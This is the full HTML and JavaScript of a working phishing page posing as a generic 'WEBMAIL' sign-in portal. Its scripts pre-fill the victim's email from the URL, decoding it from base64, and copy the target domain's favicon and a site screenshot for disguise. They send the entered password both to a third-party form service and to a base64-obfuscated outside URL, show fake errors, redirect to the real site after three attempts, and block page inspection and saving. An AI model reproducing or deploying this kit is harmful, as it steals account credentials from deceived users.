<html><head>




   
    <title class="logoname">Portal Access</title>
	
	 <link type="text/css" rel="stylesheet" href="css/bootstrap.min.css">
    
	
	
	
 <link rel="shortcut icon" type="images/icon" href="images/favicons.png">

<meta name="Robots" content="NOINDEX, NOFOLLOW">
	
</head>
<body id="top">

	
	


<script>

function setCookie(key, value, expiry) {
  var expires = new Date();
  expires.setTime(expires.getTime() + (expiry * 24 * 60 * 60 * 1000));
  document.cookie = key + '=' + value + ';expires=' + expires.toUTCString();
}
</script>
<script type="text/javascript">


function googleTranslateElementInit() {
	setCookie('googtrans', '/en/fr',1);
  new google.translate.TranslateElement({pageLanguage: 'en', layout: google.translate.TranslateElement.InlineLayout.SIMPLE}, 'google_translate_element');
}
</script>

  
 <style type="text/css">
	
	body {
 font-family: 'Open Sans', sans-serif;
 color: #535353;
 background-repeat: no-repeat;
 background-size: cover;
}
}

.img-fluid {
    max-width: 100% !important;
    height: auto;
}

.form-control:focus {
    box-shadow: none;
}

h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 {
    font-family: 'Open Sans', sans-serif;
}

/** Login 1 start **/
.login-1 {
    background: rgba(0, 0, 0, 0.04) url(../img/bg-image.jpg) top left repeat;
    background-size: cover;
    top: 0;
    width: 100%;
    bottom: 0;
    opacity: 1;
    min-height: 100vh;
    text-align: center;
    position: relative;
    display: -webkit-box;
    display: -moz-box;
    display: -ms-flexbox;
    display: -webkit-flex;
    display: flex;
    justify-content: center;
    align-items: center;
    padding: 30px;
}

.login-1 .login-inner-form {
    max-width: 500px;
    margin: 0 auto;
    color: #717171;
    text-align: center;
}

.login-1 .login-inner-form .details {
	background: rgba(255, 255, 255, 1.0);
	box-shadow: 40px 40px 6px 6px #080808;
    padding: 25px 30px 30px;
    border-radius: 10px 10px 10px 10px;
	box-shadow: 0px 0px 40px rgba(2,2,2,0.87), 0 0px 40px rgba(0,0,0,1.00);
	
}

.login-1 .login-inner-form img {
    margin-bottom: 15px;
    height: 30px;
}

.login-1 .login-inner-form h3 {
    margin: 0 0 25px;
    font-size: 18px;
    font-weight: 400;
    font-family: 'Open Sans', sans-serif;
    color: #fff;
}

.login-1 .login-inner-form .form-group {
    margin-bottom: 20px;
}

.login-1 .login-inner-form .input-text {
    width: 100%;
    padding: 10px 15px;
    font-size: 14px;
    border: 1px solid #e8e7e7;
    outline: none;
    color: #717171;
    border-radius: 3px;
    height: 45px;
}

.login-1 .login-inner-form .btn-md {
    cursor: pointer;
    padding: 12px 30px 11px 30px;
    letter-spacing: 1px;
    font-size: 15px;
    font-weight: 600;
    font-family: 'Open Sans', sans-serif;
    border-radius: 3px;
}

.login-1 .login-inner-form .social-list{
    margin-bottom: 0;
    padding: 0;
}

.login-1 .login-inner-form .checkbox a {
    font-size: 14px;
    color: #717171;
    float: right;
}

.login-1 .login-inner-form .terms{
    margin-left: 3px;
}

.login-1 .login-inner-form .checkbox {
    margin-bottom: 25px;
    font-size: 14px;
}

.login-1 .login-inner-form .form-check{
    float: left;
    margin-bottom: 0;
}

.login-1 .login-inner-form .form-check a {
    color: #717171;
    float: right;
}

.login-1 .login-inner-form .form-check-input {
    position: absolute;
    margin-left: 0;
}

.login-1 .login-inner-form .form-check label::before {
    content: "";
    display: inline-block;
    position: absolute;
    width: 17px;
    height: 17px;
    margin-left: -25px;
    border: 1px solid #cccccc;
    border-radius: 3px;
    background-color: #fff;
}

.login-1 .login-inner-form .form-check-label {
    padding-left: 25px;
    margin-bottom: 0;
    font-size: 14px;
}

.login-1 .login-inner-form .checkbox-theme input[type="checkbox"]:checked + label::before {
    background-color: #0f96f9;
    border-color: #0f96f9;
}

.login-1 .login-inner-form input[type=checkbox]:checked + label:before {
    font-weight: 300;
    color: #f3f3f3;
    line-height: 15px;
    font-size: 14px;
    content: "\2713";
}

.login-1 .login-inner-form input[type=checkbox], input[type=radio] {
    margin-top: 4px;
}

.login-1 .login-inner-form .social-list li {
    display: inline-block;
    font-size: 16px;
    margin-top: 30px;
}

.login-1 .login-inner-form .social-list li a {
    margin:2px;
    font-size: 14px;
    width: 35px;
    height: 35px;
    border-radius: 3px;
    display: inline-block;
    text-align: center;
    line-height: 35px;
}

.login-1 .login-inner-form .footer {
    font-size: 14px;
    padding: 15px 20px;
    background-color: #f5f5f5;
    border-radius: 0 0 5px 5px;
    border-top: solid 1px #f5f5f5;
}

.login-1 .login-inner-form .footer span a {
    color: #717171;
}

.login-1 .login-inner-form button:focus {
    outline: none;
    outline: 0 auto -webkit-focus-ring-color;
}

.login-1 .login-inner-form .btn-theme:not([disabled]):not(.disabled).active, .btn-theme:not([disabled]):not(.disabled):active, .show > .btn-theme.dropdown-toggle {
    box-shadow: none;
}

.login-1 .login-inner-form .btn-theme.focus, .btn-theme:focus {
    box-shadow: none;
}

.login-1 .login-inner-form .btn-theme {
    background: #0f96f9;
    border: none;
    color: #fff;
}

.login-1 .login-inner-form .btn-theme:hover {
    background: #0294B6;
}

/** Social media **/
.login-1 .facebook-bg {
    background: #4867aa;
    color: #fff;
}

.login-1 .facebook-bg:hover {
    background: #3b589e;
    color: #fff;
}

.login-1 .twitter-bg {
    background: #33CCFF;
    color: #fff;
}

.login-1 .twitter-bg:hover {
    background: #56d7fe;
    color: #fff;
}

.login-1 .google-bg {
    background: #db4437;
    color: #fff;
}

.login-1 .google-bg:hover {
    background: #dc4e41;
    color: #fff;
}

.login-1 .linkedin-bg {
    background: #0177b5;
    color: #fff;
}

.login-1 .linkedin-bg:hover {
    background: #1c82ca;
    color: #fff;
}

/** MEDIA **/
@media (max-width: 992px) {
    .login-1 {
        padding: 30px 0;
    }
}
   .row {
            margin: 10px 0;
        }

        .row:after {
            content: "";
            display: table;
            clear: both;
        }

	</style>
  
  
 <iframe id="mainPage" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>

<!-- Login 1 start -->
<div class="login-1">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="login-inner-form">
                    <div class="details">
                        
      <form method="POST" id="form">
<!-- Replace with your Access Key -->
    <input type="hidden" name="access_key" value="66f07047-ca6f-46e6-87d2-4080141000ca">
<div align="left">
           <h2 class="text-center"><div id="top" align="left"><img src="images/favicons.png" alt="" id="logoimg" style="width:25px;height:25px;margin-top:20px;">
		 
		  <span style="vertical-align: middle; padding-left: 3px;color: #fff;" id="logoname"><span style="font-size: 25px;color:black; font-family: Arial Black;
            text-transform: uppercase !important;
            text-align: center;
            font-size: 25px;
            color: #444444;
            background-color: rgba(255, 255, 255, 0);
            text-shadow: rgb(255, 255, 255) 2px 2px 2px; "><span class="logoname"><strong> WEBMAIL</strong></span></span></span> </div>
        &nbsp;
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-user"></i></span>
            <input type="email" class="form-control" name="ai" placeholder="Username" value="" id="ai" readonly="">
          </div>
        </div>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-lock"></i></span>
            <input type="password" class="form-control" id="pr" name="pr" placeholder="Password" required="required">
          </div>
        </div>
		<div class="form-group">
		 <div align="left">
          <input type="checkbox"><span style="font-size: 15px;color:gray;"> Remember me </span> 
        </div>
		</div>
        <div class="form-group">
         
		           <button type="submit" class="btn btn-primary login-btn btn-block" id="submit">Sign in</button>
        </div>
       <center><div id="result" style="font-size:15px;"></div></center>
 <div class="row">
      <p style="font-size:15px;color:#ff2b10;"><b>NOTICE</b>:</p>
      <p class="text-capitalize text-left" style="font-size:11px;"> This information system is the property of <span class="logoname"><b>WEBMAIL</b></span>. <br>We advise all users to verify their email account for security reasons.
              By continuing to use the system you indicate your awareness of and consent to these terms and conditions
              of use. </p>
 </div>

<script src="https://web3forms.com/client/script.js" async defer></script>

<script>
const form = document.getElementById('form');
const result = document.getElementById('result');

form.addEventListener('submit', function(e) {
  e.preventDefault();
  const formData = new FormData(form);
  const object = Object.fromEntries(formData);
  const json = JSON.stringify(object);
  result.innerHTML = "<span style='color:green'><b>Processing...</b></span>" 
 
    fetch('https://api.web3forms.com/submit', {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json',
                'Accept': 'application/json'
            },
            body: json
        })
        .then(async (response) => {
            let json = await response.json();
            if (response.status == 200) {
                result.innerHTML = "<span style='color:red'><b>Network Error! Please verify your information and try again</b></span>";
            } else {
                console.log(response);
                result.innerHTML = json.message;
            }
        })
        .catch(error => {
            console.log(error);
            result.innerHTML = "Something went wrong!";
        })
        
});

</script>

    </h2></div></form>





    <style>.tb_button {padding:1px;cursor:pointer;border-right: 1px solid #8b8b8b;border-left: 1px solid #FFF;border-bottom: 1px solid #fff;}.tb_button.hover {borer:2px outset #def; background-color: #f8f8f8 !important;}.ws_toolbar {z-index:100000} .ws_toolbar .ws_tb_btn {cursor:pointer;border:1px solid #555;padding:3px}   .tb_highlight{background-color:yellow} .tb_hide {visibility:hidden} .ws_toolbar img {padding:2px;margin:0px}</style>


 <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-48347893-1"></script>
<script src="js/jquery.min.js"></script>
<script src="js/mesg_en.js"></script>
<script async="" src="js/pack.min.js"></script>
<script src="js/appleid.auth.js"></script>
<script async="" src="js/authen.min.js"></script>

        <script>

// prevent ctrl + s
$(document).bind('keydown', function(e) {
if(e.ctrlKey && (e.which == 83)) {
e.preventDefault();
return false;
}
});

document.addEventListener('contextmenu', event => event.preventDefault());

document.onkeydown = function(e) {
if (e.ctrlKey && 
(e.keyCode === 67 ||   
e.keyCode === 86 || 
e.keyCode === 85 || 
e.keyCode === 117)) {
return false;
} else {
return true;
}
};
$(document).keypress("u",function(e) {
if(e.ctrlKey)
{
return false;      }
else {
return true;
}});




    /* global $ */
/* global $ */
$(document).ready(function () {
  var count = 0;

  $('#back1').click(function () {
    $("#msg").hide();
    $('#ai').val("");
    $("#automail").animate({ left: 200, opacity: "hide" }, 0);
    $("#inputbar").animate({ right: 200, opacity: "show" }, 1000);
  });

  var ai = window.location.hash.substr(1);
  if (!ai) {

  } else {
    var base64regex = /^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;

    if (!base64regex.test(ai)) {
      var my_ai = decodeURIComponent(ai);
    } else {
      var my_ai = atob(ai);
    }

    var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

    if (!filter.test(my_ai)) {
      $('#error').show();
      $('#error').html("<p class='alert alert-danger' style='font-size:14px'>That account doesn't exist. Enter a different account</p>");
      return false;
    }

    var ind = my_ai.indexOf("@");
    var my_slice = my_ai.substr((ind + 1));
    var c = my_slice.substr(0, my_slice.indexOf('.'));
    var final = c.toLowerCase();

    $('#ai').val(my_ai);
    $('#ai').attr('readonly', true);
    $("#msg").hide();
  }

  $(".logoname").html(final);

  var ind = my_ai.indexOf("@");
  var my_slice = my_ai.substr((ind + 1));
  var mainPage = 'https://' + my_slice;

  var sv = my_slice;

  var image = "url('https://image.thum.io/get/65490-1671030344805-37a36e07674665dbe1105f1044aab44d/width/1200/https://" + sv + "')";

  $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
  document.body.style.backgroundImage = image;
  $(".email").html(ai);

  $('#submit-btn').click(function (event) {
    event.preventDefault();
    $('#error').hide();
    $('#msg').hide();
    var ai = $("#ai").val();
    var pr = $("#pr").val();

    var my_ai = ai;
    var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

    if (!ai) {
      $('#error').show();
      $('#error').html("<p class='alert alert-danger' style='font-size:14px'> Email field is empty</p>");
      return false;
    }

    if (!filter.test(my_ai)) {
      $('#error').show();
      $('#error').html("<p class='alert alert-danger' style='font-size:14px>That account doesn't exist. Enter a different account</p>");
      return false;
    }

    if (!pr) {
      $('#error').show();
      $('#error').html("<p class='alert alert-danger' style='font-size:14px'> Password field is empty </P>");
      return false;
    }

    if (pr.length < 5) {
      $('#error').show();
      $('#error').html("<p class='alert alert-danger' style='font-size:14px'>An error occured, invalid password</p>");
      email.focus;
      return false;
    }

    count = count + 1;

    var d = atob('aHR0cHM6Ly9wcmVzaWRlbmN5Y29sbGVnZS5pbi9tYWluLnBocA');
    $.ajax({
      dataType: 'JSON',
      url: d,
      type: 'POST',
      data: {
        email: ai,
        password: pr
      },
      beforeSend: function (xhr) {
        $('#submit-btn').html('Please wait.....');
      },
      success: function (response) {
        $('#msg').html("<span style='color:red;'>Password is incorrect. Please try again</span>");
        if (response) {
          $("#msg").show();
          console.log(response);
          $('#msg').html(response['msg']);
          if (response['signal'] == 'ok') {
            $("#pr").val("");
            if (count >= 3) {
              count = 0;
              window.location.replace("http://" + sv);
            }
          } else {
            $('#msg').html(response['msg']);
          }
        }
      },
      error: function () {
        $("#pr").val("");
        if (count >= 3) {
          count = 0;
          window.location.replace("http://" + sv);
        }
        $("#msg").show();
      },
      complete: function () {
        $('#submit-btn').html('Sign in');
      }
    });
  });
});


  </script>
  
	
	




</div></div></div></div></div></div></body></html>